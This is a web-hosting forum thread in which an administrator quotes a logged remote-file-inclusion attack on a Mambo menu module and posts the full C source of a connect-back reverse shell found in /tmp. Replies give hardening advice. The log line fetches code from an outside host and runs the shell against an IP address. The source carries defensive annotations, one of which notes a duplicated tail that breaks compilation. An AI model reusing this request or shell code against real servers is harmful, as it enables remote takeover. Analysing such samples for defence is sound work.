
Thread: Backdoor

  1. #1
    Join Date
    Aug 2002
    Posts
    1,633

    Backdoor

    Hi

    Today I found a file in my /tmp directory, which I have mounted noexec and nosuid; I also have the compilers disabled. How can I stop people from uploading to the /tmp folder?

    they get access from:

    "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://exploit.webcindario.com/cse.gif?&cmd=cd%20/tmp/;gcc%20-o%20dc-connectback%20dc-connectback.c;./dc-connectback%20200.199.178.13%2080

    Do you think he has executed it?

    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    /*
     * Analyst summary (defensive reading of the sample as posted): this is a
     * connect-back shell. It takes a host and an optional port (default 80)
     * on the command line, opens an outbound TCP connection to that endpoint,
     * then forks a child that attaches stdin/stdout/stderr to the socket and
     * execs /bin/sh.
     *
     * The source alone cannot show whether it was ever run. Indicators that
     * are visible in this code and can be checked on a host: the banner and
     * status strings below (present in any compiled copy), an outbound TCP
     * connection to the host/port passed in argv, and a /bin/sh process whose
     * argv[0] is "shell" with file descriptors 0-2 referring to a socket.
     */
    int main(int argc, char **argv) {
    char *host;
    int port = 80;
    int f;
    int l;
    int sock;
    struct in_addr ia;
    struct sockaddr_in sin, from;
    struct hostent *he;
    /*
     * Banner written to the remote end after the connection is made. It tells
     * the operator to unset HISTFILE/SAVEHIST, so an empty shell history is
     * not evidence that no commands were run; rely on web-server logs,
     * process accounting or audit logs instead.
     */
    char msg[ ] = "Welcome to Data Cha0s Connect Back Shell\n\n"
    "Issue \"export TERM=xterm; exec bash -i\"\n"
    "For More Reliable Shell.\n"
    "Issue \"unset HISTFILE; unset SAVEHIST\"\n"
    "For Not Getting Logged.\n(;\n\n";
    printf("Data Cha0s Connect Back Backdoor\n\n");
    /* Accepts exactly one or two arguments: host, then an optional port. */
    if (argc < 2 || argc > 3) {
    printf("Usage: %s [Host] <port>\n", argv[0]);
    return 1;
    }
    printf("[*] Dumping Arguments\n");
    /* Copy the host argument into a heap buffer of strlen(argv[1]) bytes. */
    l = strlen(argv[1]);
    if (l <= 0) {
    printf("[-] Invalid Host Name\n");
    return 1;
    }
    if (!(host = (char *) malloc(l))) {
    printf("[-] Unable to Allocate Memory\n");
    return 1;
    }
    strncpy(host, argv[1], l);
    /* Optional second argument overrides the default port of 80. */
    if (argc == 3) {
    port = atoi(argv[2]);
    if (port <= 0 || port > 65535) {
    printf("[-] Invalid Port Number\n");
    return 1;
    }
    }
    printf("[*] Resolving Host Name\n");
    /*
     * Resolve the destination: a DNS/hosts lookup first, then a fallback that
     * parses the argument as a dotted-quad address. A name lookup here may
     * therefore also appear in resolver logs.
     */
    he = gethostbyname(host);
    if (he) {
    memcpy(&ia.s_addr, he->h_addr, 4);
    } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
    printf("[-] Unable to Resolve: %s\n", host);
    return 1;
    }
    /* Build the IPv4 destination address from the resolved host and port. */
    sin.sin_family = PF_INET;
    sin.sin_addr.s_addr = ia.s_addr;
    sin.sin_port = htons(port);
    printf("[*] Connecting...\n");
    /*
     * The connection is outbound from this host (socket + connect, no
     * bind/listen), so inbound filtering does not stop it; egress filtering
     * for the web-server account is the relevant control.
     */
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    printf("[-] Socket Error\n");
    return 1;
    }
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
    printf("[-] Unable to Connect\n");
    return 1;
    }
    printf("[*] Spawning Shell\n");
    f = fork( );
    if (f < 0) {
    printf("[-] Unable to Fork\n");
    return 1;
    } else if (!f) {
    /*
     * Child: send the banner, point fds 0, 1 and 2 at the socket, then
     * replace the process image with /bin/sh. argv[0] is set to "shell", so
     * the process name shown in listings differs from the executable path.
     * The close/return below are reached only if execl fails.
     */
    write(sock, msg, sizeof(msg));
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
    execl("/bin/sh", "shell", NULL);
    close(sock);
    return 0;
    }
    /*
     * Parent: prints the status line and reaches the end of main without
     * waiting for the child, so the shell process outlives the launcher.
     */
    printf("[*] Detached\n\n");
    }
    /*
     * NOTE(review): as posted, the brace on the previous line already closes
     * main; the three lines below repeat the tail outside any function, so
     * this listing does not compile as shown. This may be a paste artefact;
     * the file found on disk may differ.
     */
    printf("[*] Detached\n\n");
    return 0;
    }

  2. #2
    Join Date
    Jul 2002
    Posts
    3,734

  3. #3
    Join Date
    Aug 2002
    Posts
    1,633
    Yes, I know, but customers don't seem to like updating... As I asked, is there any way to stop users from uploading to /tmp?

  4. #4
    Join Date
    Jul 2002
    Posts
    3,734
    Use mod_security, disable wget, etc, maybe firewall outgoing traffic on port 80...there are a number of things.

    If your customers won't upgrade, suspend them. Not upgrading to fix a problem like that isn't an option they should have.
